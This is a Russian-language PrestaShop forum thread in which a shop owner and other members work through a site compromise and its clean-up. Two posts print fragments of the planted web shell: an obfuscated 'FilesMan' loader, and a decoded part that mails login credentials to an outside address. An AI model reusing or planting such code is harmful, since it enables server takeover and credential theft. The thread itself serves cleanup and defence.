Автор Тема: вирус для wordpress на сайте престашоп  (Прочитано 223 раз)

16 Июля 2016, 22:11:39
  • Пользователь
  • **
  • Сообщений: 68
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
доброго вечера!
столкнулся с траблами.

итак - визуально на сайте не отображается никак. сначала появились пустые 0кб файлы повсем папкам
затем - появилась папка с названием wp-config
при этом в исп-менеджере сожрано всё свободное место на хостинге, а сайт возвращает соответственно хттп500. но использование диска показывает только использование на половину, а вкладка главное показывает 100% забитости.

нашёл добавления в индекс.пхп в корне - восстановил из бэкапа. есть ещё другой сайт для теста, так там за год вообще прописалась главная страница с словами hacked by ... удалил всё нафиг.

также появились тхт файлы с текстом hacked by кто-то там...

я так понимаю, что где-то прописался вредоносный скрипт. хостер жаловался на определенный файл - удалил его (тест.пхп в одном из модулей).

планирую удалить всё кроме папок модулей и тем и заново поставить ту же версию престашоп и вкорячить старую бд на место.

у вас хочу спросить, кто сталкивался с таким? и что можно сделать? пароли все сменил
17 Июля 2016, 10:54:54
Ответ #1
  • Фрилансер
  • *
  • Сообщений: 235
  • Репутация: +2/-0
    • Просмотр профиля
Точно такая же проблема. Решение есть?
17 Июля 2016, 11:01:34
Ответ #2
  • Ветеран
  • *****
  • Сообщений: 85948
  • Репутация: +25399/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Проверьте файл /controllers/admin/AdminLoginController.php.
17 Июля 2016, 13:28:42
Ответ #3
  • Пользователь
  • **
  • Сообщений: 68
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Проверьте файл /controllers/admin/AdminLoginController.php.

Проверил, модифицирован, заменил на стандартный.
Подскажите, а как избежать повторного заражения, где источник то?
17 Июля 2016, 13:34:04
Ответ #4
  • Ветеран
  • *****
  • Сообщений: 1194
  • Репутация: +28/-1
  • Сообщество PrestaShop
    • Просмотр профиля
Такая же тема - http://prestashop-forum.ru/index.php/topic,6876.0.html
Нужно создать раздел по безопасности, тема актуальная. Жалко если потеряется, найти что-то на форуме не реально. Сильно много тем.

У вас на хостинге, кроме prestashop, есть другие cms? Такие взломы чаще всего на wordpress и его приложениях.
17 Июля 2016, 13:36:32
Ответ #5
  • Пользователь
  • **
  • Сообщений: 68
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Такая же тема - http://prestashop-forum.ru/index.php/topic,6876.0.html
Нужно создать раздел по безопасности, тема актуальная. Жалко если потеряется, найти что-то на форуме не реально. Сильно много тем.

У вас на хостинге, кроме prestashop, есть другие cms? Такие взломы чаще всего на wordpress и его приложениях.

да есть, как раз вордпресс. уже потёр его к чертям.
17 Июля 2016, 13:59:16
Ответ #6
  • Ветеран
  • *****
  • Сообщений: 2163
  • Репутация: +49/-4
  • Сообщество PrestaShop
    • Просмотр профиля
Им на отдельном хостинге держать нужно.
Wordpress постояно ломают.
18 Июля 2016, 07:08:11
Ответ #7
  • Пользователь
  • **
  • Сообщений: 68
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Свежие новости!
Вернулись удалённые файлы и папки.
а гугл аналитикс сообщил, что у ресурса добавился владелец)))

удалил файлик гугла с фтп, удалил владельца.
и пошёл смотреть какие папки и файлы были изменены примерно во время появления нового владельца.

перечисляю:
-в папке модулей оказался забавненький файл cacheplugin.php c кодом

<?php
$auth_pass 
"";
$color "#df5";
$default_action base64_decode('RmlsZXNNYW4=');
$default_use_ajax true;
$default_charset 'Windows-1251';
$xYEzDu6r3EZT="GR5yYXp3YH1bFJiSkhoc2RGVnNRMkkxUjNoelhTbGVNakV5T1RRd05USXdOQ2twTzMxbGRtRnNLQ1I0YzFacFZFOWlObWcwVGlrNyIpKTs6="));
return;
?>

Следующие файлы также попали в замес и находятся в папке модулей index.php .htaccess archive.php mw.html Xmw.php
Какой-то morocanwolf в общем меня "взломал"

-папки wp-config, tanis

Проблема с забитым до отказа хостингом решилась - отключил ведение логов ошибок для домена - сразу освободилось 15гб.

Судя по времени появления файлов в папке модулей, заражена вся папка - изменения с разницей в 0-1 секунды пробежались по всем папкам.
18 Июля 2016, 09:57:02
Ответ #8
  • Ветеран
  • *****
  • Сообщений: 2163
  • Репутация: +49/-4
  • Сообщество PrestaShop
    • Просмотр профиля
Вычистить трудно будет. Лучше снести все, заново установить prestashop, импортировать данные со старого магазина. Только так будешь уверен, что на сайте нет вируса.
18 Июля 2016, 10:04:55
Ответ #9
  • Пользователь
  • **
  • Сообщений: 68
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Вычистить трудно будет. Лучше снести все, заново установить prestashop, импортировать данные со старого магазина. Только так будешь уверен, что на сайте нет вируса.
Уже занимаюсь.
Фишка в том, что нужно знать как эта хрень туда пролезла!

Я думаю, что из-за установки какого-то модуля.

И как обезопасить себя от подобных ситуёвин? Пока что сделал права на папки 755, файлы 664, и снова сменил пароль.

Но как я понимаю,вышеуказанный пхп код сам генерировал доступ и пароль
18 Июля 2016, 10:19:03
Ответ #10
  • Ветеран
  • *****
  • Сообщений: 13135
  • Репутация: +14553/-0
  • Сообщество PrestaShop
    • Просмотр профиля
http://prestashop-forum.ru/index.php/topic,6876.msg43430.html#msg43430

Указанный код - это только часть кода. Из него ничего не понятно. Этот файл подключается в другом файле.
18 Июля 2016, 10:27:59
Ответ #11
  • Пользователь
  • **
  • Сообщений: 68
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
http://prestashop-forum.ru/index.php/topic,6876.msg43430.html#msg43430

Указанный код - это только часть кода. Из него ничего не понятно. Этот файл подключается в другом файле.

Если нужно, то могу привести другие коды.
в новых папках раскиданы около 20 сайтмапов и несколько пхп
18 Июля 2016, 10:33:22
Ответ #12
  • Ветеран
  • *****
  • Сообщений: 13135
  • Репутация: +14553/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Не нужно. Я такое уже видел. Вот эта переменная
$default_action = base64_decode('RmlsZXNNYW4=');от Shell скрипта, при декодировании получится
$default_action = 'FilesMan';
Если собрать все куски кода, то будет так
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Egy_Spider
UserName: " . htmlspecialchars($tacfgd['uname']) . "
PassWord:
" . htmlspecialchars($tacfgd['pword']) . "
Message:
" . "
E-server: " . htmlspecialchars($_SERVER['REQUEST_URI']) . "
E-server2: " . htmlspecialchars($_SERVER["SERVER_NAME"]) . "

IP:
";
mail("wp@live.fr", "Shell http://$web$inj", "$body");
# Web Shell by boff
$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
.....

Вест shell скрипт не выкладаваю. Но это точно он. Уже не первый клиент обращается с точно такой же проблемой.
18 Июля 2016, 10:41:28
Ответ #13
  • Ветеран
  • *****
  • Сообщений: 13135
  • Репутация: +14553/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Последнии случаи взлома уже сделаны имено под prestashop. Части shell скрипта срхранены в файлах перевода темы и модулей. Атака направлена имено на престу. Проверяйте файлы перевода, особое внимание на редкие языки jp.php, ch.php и т.д.
18 Июля 2016, 10:55:38
Ответ #14
  • Пользователь
  • **
  • Сообщений: 68
  • Репутация: +0/-0
  • Сообщество PrestaShop
    • Просмотр профиля
Последнии случаи взлома уже сделаны имено под prestashop. Части shell скрипта срхранены в файлах перевода темы и модулей. Атака направлена имено на престу. Проверяйте файлы перевода, особое внимание на редкие языки jp.php, ch.php и т.д.

Спасибо за совет.
Но это пользователь сам должен занести или установить модуль или тему, верно?

Попутно хотелось бы узнать для чего раскиданы по 2 файла почти в каждом каталоге - все 0 байт.
Их я удалил - скачал и нашёл через тотал коммандер все 0б файлы и удалил.